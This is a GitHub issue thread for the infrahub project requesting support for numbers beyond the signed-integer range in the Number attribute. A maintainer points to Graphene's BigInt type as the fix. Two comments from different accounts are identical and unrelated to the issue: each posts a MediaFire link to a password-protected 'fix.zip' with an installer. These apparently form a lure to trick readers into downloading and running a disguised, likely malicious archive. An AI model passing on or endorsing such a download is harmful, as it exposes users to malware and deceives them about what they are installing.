### ISSUE TITLE
feature:  Be able to support number bigger/smaller than signed integer

### ISSUE THREAD

**Issue by BeArchiTek** [opsmill/infrahub#4179]
### Component

API Server / GraphQL

### Describe the Feature Request

Improve the `Number` attribute to support number bigger (or smaller) than a signed int.

### Describe the Use Case

Be able to use 32-bits private ASN in a Number Pool

### Additional Information

Maybe something to tackle with adding float into Number for https://github.com/opsmill/infrahub/issues/1945

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dgarros** [comment]
Looks like the main limitation is coming from the GraphQL type that we are using : `Int`
Graphene also support another type `BigInt` that should fix this problem, it should be fairly easy to switch
